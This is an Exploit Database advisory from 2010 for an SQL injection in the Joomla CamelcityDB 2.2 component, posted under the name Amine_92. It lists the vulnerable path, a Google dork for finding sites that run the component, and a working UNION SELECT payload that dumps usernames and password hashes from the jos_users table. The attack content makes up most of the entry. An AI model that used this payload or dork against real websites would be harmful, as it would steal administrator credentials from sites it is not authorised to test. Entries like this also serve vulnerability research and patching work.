Joomla! Component CamelcityDB 2.2 - SQL Injection

EDB-ID:

14530


Author:

Amine_92

Type:

webapps


Platform:

PHP

Date:

2010-08-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

==============================================================
Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
==============================================================
 
###########################
Title : Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
Script : Joomla CamelcityDB 2.2
Date : 02/08/2010
Author : Amine_92
Tested : All version
Home : http://vbhacker.net
Dork : inurl:"option=com_camelcitydb2"
contact : amine92_16@hotmail.fr
###########################  
          
[ Vulnerable File ]
      
[path]/index.php?option=com_camelcitydb2&view=all&Itemid=15
 
[SQL]:
 
/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
 
##############################################################  
Thank's to : All Hacker Mu$lim & Poeple of Gaza